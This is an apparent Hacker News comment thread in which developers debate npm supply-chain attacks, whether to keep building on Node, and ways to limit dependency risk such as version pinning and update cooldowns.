Node doesn't have any particular relation to NPM? You don't have to download 1000 other people's code. Writing your own code is a thing that you are legally allowed to do, even if you're writing in Javascript.
Yes, and you can code in assembly as well if you want it. But: that's not how 99% of the people using node is using it so that it is theoretically possible to code up every last bit yourself is true but it does not contribute to the discussion at all.
An eco-system, if it insists on slapping on a package manager (see also: Rust, Go) should always properly evaluate the resulting risks and put proper safeguards in place or you're going to end up with a massive supply chain headache.
Writing code yourself so as not to cultivate 1000 dependencies you can't possibly ensure the security of is not the same as writing assembly. That you even reach for that comparison is indicative of the deep rot in Javascript culture. Writing your own code is perceived as a completely unreasonable thing to be doing to 99% of JS-devs and that's why the web performs like trash and has breaches every other day, but it's actually a very reasonable thing to be doing and people who write most any other language typically engage in the writing of own code on a daily basis. At any rate, JS the language itself is fine, Node is fine, and it is possible to adopt better practices without forsaking the language/ecosystem completely.
8 replies →
So your supposed to write your own posthog? be serious
I tell people this over and over and over: every time you use a third party dependency, especially an ongoing one, you should consider that you are adding the developers to your team and importing their prior decisions and their biases. You add them to your circle of trust.
You can't just scale out a team without assessing who you are adding to it: what is their reputation? where did they learn?
It's not quite the same questions when picking a library but it is the same process. Who wrote it? What else did they write? Does the code look like we could manage it if the developer quits, etc.
Nobody's saying you shouldn't use third party dependency. But nobody benefits if we pretend that adding a dependency isn't a lot like adding a person.
So yeah, if you need all of posthog without adding posthog's team to yours, you're going to have to write it yourself.
1 reply →
Yes. If your shop is serious about security, it is in no way unreasonable to be building out tools like that in-house, or else paying a real vendor with real security practices for their product. If you're an independent developer, the entirety of Posthog is overkill, and you can instead write the specific features you need yourself.
1 reply →
If they have a HTTP API using standard authentication methods it's not that difficult to create a simple wrapper. Granted a bit more work if you want to do things like input/output validation too, but there's a trade-off between ownership there and avoiding these kinds of supply-chain attacks.
4 replies →
npm has been the official package manager for node since forever (0.8 or earlier iirc). I think even before the io.js fork and merge.
Professionally I am a fulltime FE Dev using Typescript+React. My Backends for my side projects are all done in C#, even so I'd be fluent in node+typescript for that very reason. In a current side project, my backend only has 3 external package dependencies, 2 of which are SQLite+ORM related. The frontend for that sideproject has over 50 (React/Typescript/MaterialUI/NextJS/NX etc.)
.NET being so batteries-included is one of its best features. And when vulnerabilities do creep in, it's nice to know that Microsoft will fix it rather than hoping a random open source project will.
There's only two kind of technologies.
The ones that most people use and some people complain about, and the ones that nobody uses and people keep advocating for.
This a common refrain on HN, frequently used to dismiss what may be perfectly legitimate concerns.
It also ignores the central question of whether NPM is more vulnerable to these attacks than other package managers, and should therefore be considered an unreasonable security risk.
It's not just npm, you should also not trust pypi, rubygems, cargo and all the other programming language package managers.
They are built for programmers, not users. They are designed to allow any random untrusted person to push packages with no oversight whatsoever. You just make an account and push stuff. I have no doubt you can even buy accounts if you're malicious enough.
Users are much better served by the Linux distribution model which has proper maintainers. They take responsibility for the packages they maintain. They go so far as to meet each other in person so they can establish decentralized root of trust via PGP.
Working with the distributions is hard though. Forming relationships with people. Participating in a community. Establishing trust. Working together. Following packaging rules. Integrating with a greater dynamic ecosystem instead of shipping everything as a bloated container whose only purpose is to statically link dynamic libraries. Developers don't want to do any of that.
Too bad. They should have to. Because the npm clusterfuck is what you get when you start using software shipped by totally untrusted randoms nobody cares to know about much less verify.
Using npm is equivalent to installing stuff from the Arch User Repository while deliberately ignoring all the warnings. Malware's been found there as well, to the surprise of absolutely no one.
There are far too many languages and many packages for each of them for this (good) idea to be practicable.
You can go very far with just node alone (accepts typescript without tsc, has testing framework,...). Include pg library that has no dependencies. Build a thin layer above node and you can have pretty stable setup. I got burnt so many times that I think it is simply impossible to build something that won't break within 3 months if you start including batteries.
When it comes to frontend, well I don't have answers yet.
You can write simple front-end without reactive components. Most pages are not full blown apps and they were fine for a very long time with jQuery, whose features have been largely absorbed into plain js/dom/CSS.
> Serious question: should someone develop new technologies using Node any more?
I think we have given the Typescript / Javascript communities enough time. These sort of problems will continue to happen regardless of the runtime.
Adding one more library increases the risk of a supply-chain attack like this.
As long as you're using npm or any npm-compatible runtime, then it remains to be an unsolved recurring issue in the npm ecosystem.
> Serious question: should someone develop new technologies using Node any more?
Serious answer: no.
I think I'm going to just use a static site generator, maybe add some WASM modules built with a language that has a sane package manager and enjoy my life instead of getting involved with this cluster of a show.
Node itself is still fine and you can do a lot these days without needing tons of library. No need for axios when we have fetch, there's a built-in test runner and assertion library.
There are some things that kind of suck (working with time - will be fixed by the Temporal API eventually), but you can get a lot done without needing lots of dependencies.
Hell no.
You need standalone dependencies, like Tailwind offers with its standalone CLI. Predators go where there prey is. NPM is a monoculture. It's like running Windows in the 90's; you're just asking for viruses. But 90% of frontend teams will still use NPM because they can't figure anything else out.
Building websites =/= Developing new technologies.
Yup! No new technologies have been invented or discovered thru building websites since CSS 1.0 in 1996.
Even worse! We lost <FRAME> along the way.
Just lock your packages to patch versions, make sure to use versions that are at least a week old.
And maybe don't update your dependencies very often.
If I had to bet, the most likely and pragmatic solution will be to have dependencies cooldown and that's it
If everyone does it, then it becomes less effective, because there'd be fewer early testers to experience and report issues, no?
Yes, it's gonna be heuristics all way down. This problem isn't solved formally but the ecosystem(s) having these issues are too big to be discarded "just" because of that.
Node and npm are not the same things. I'm not even a developer. You're seriously a developer?
If you're looking for practical recommendations how to work with npm maintaining reasonable safety expectations, my post here mostly covers it: https://worklifenotes.com/2025/09/24/npm-has-become-a-russia...
Npm has been a shit show from day 1. Unfortunately, Industry momentum and vc funded "fail fast, fail often" is a hell of a drug.
EDIT: Coffee hasnt kicked in yet, that was harsher than I intended. For what it's worth, it's not specifically/solely NPM/nodes fault, more of a convergance of the above and the ecosystem/users just as much as any of the Node/NPM devs/maintainers in combination with it having such a large attack cross section. Even if it had a reputation for being bulletproof and secure as fuck there's still such a large userbase with huge potential if exploited that'd it'd almost assuredly inevitably be compromised from time to time regardless.
While I feel we could use a whole lot less javascript on the web (client and server side both), without a competitor or something, it's shear size ensures any such expliot/issue gets amplified 1000x versus nearly any other project save for maybe major OS's and Browsers themselves.
You have this issue with ALL external code though. npm/node and javascript overall may exacerbate this problem, but you have it with any other remote repository too - often without even noticing it unless you pay close attention; see the xz-utils backdoor, it took a while before someone noticed the sneaky payload. So I don't think this works as a selective filter against using node, if you have a use case for it.
Take ruby - even before when a certain corporation effectively took over RubyCentral and rubygems.org, almost two years ago they also added a 100.000 download limit. That is, after that threshold was passed, the original author was deprived of the ability to remove the project again - unless the author resigns from rubygems.org. Which I promptly did. I could not accept any corporation trying to force me into maintaining old projects (I tend to remove old projects quickly; the licence allows people to fork it, so they can maintain it if they want to, but my name can not be associated with outdated projects I already abandoned, since newer releases were available. The new corporate overlords running rubygems.org, who keep on lying about "they serve the community", refused to accept this explanation, so my time came to a natural end at rubygems.org. Of course this year it would be even easier since they changed the rules to satisfy their new corporate overlords anyway: https://blog.rubygems.org/2025/07/08/policies-live.html)
You forget to account for the fact that the xz-utils backdoor was extremely high effort. Literally a high skilled person building trust over time. While it's obviously possible and problematic, it's still a scaling/time issue.
Serious answer: no.
Couldn't similar issues happen with Rust, Python, Dart, C#, Java, Ruby? Supply chain attacks are not unique to Node / NPM.
I'm sure the list of available attacks are somewhat different, but you can get pwned in all of these ecosystems.
> Serious question: should someone develop new technologies using Node any more?
Please, no.
It is an absolutely terrible eco system. The layercake of dependencies is just insane.
Node the technology can be used without blindly relying on the update features of npm. Vet your dependency trees, lock your dependency versions at patch level and use dependency cooldown.
This is something you also need to do with package managers in other languages, mind you.
If everybody in your country drives on the right side of the road you could theoretically drive on the left. But you won't get very far like that.
People use Node because of the availability of the packages, not the other way around.
13 replies →
The list of affected packages are all under namespaces pretty much nobody uses or are subdependencies of junk libraries nobody should be using if they're serious about writing production code.
I'm getting tired of the anti-Node.js narrative that keeps going around as if other package repos aren't the same or worse.
You need to explain how one is supposed to distinguish and exclude "namespaces pretty much nobody uses" when writing code in this ecosystem. My understanding is that a typical Node developer pretty much has no control over what gets pulled in if they want to get anything done at all. If that's the case, then you don't have an argument. If a developer genuinely has no control, then the point is moot.
How is this situation any different from any other ecosystem? I think you don't have an argument here other than that npm is a relatively large public repository. Bad actors and ignorant developers are everywhere else too.
There are plenty of npm features to help assess packages and prevent unintended updates, but nothing replaces due diligence.
1 reply →
The only way a worm like this spreads is usage of the affected packages. The proliferation itself is clear evidence of use.
Ok, I'll bite; which package repos are "the same or worse" than those of nodejs?
All of them. The issue at hand is not limited to a specific language or tool or ecosystem, rather it is fundamental to using a package manager to install and update 3rd party libraries.
I see a bunch under major SaaS vendor namespaces that have millions of weekly downloads…?
Popular junk is still junk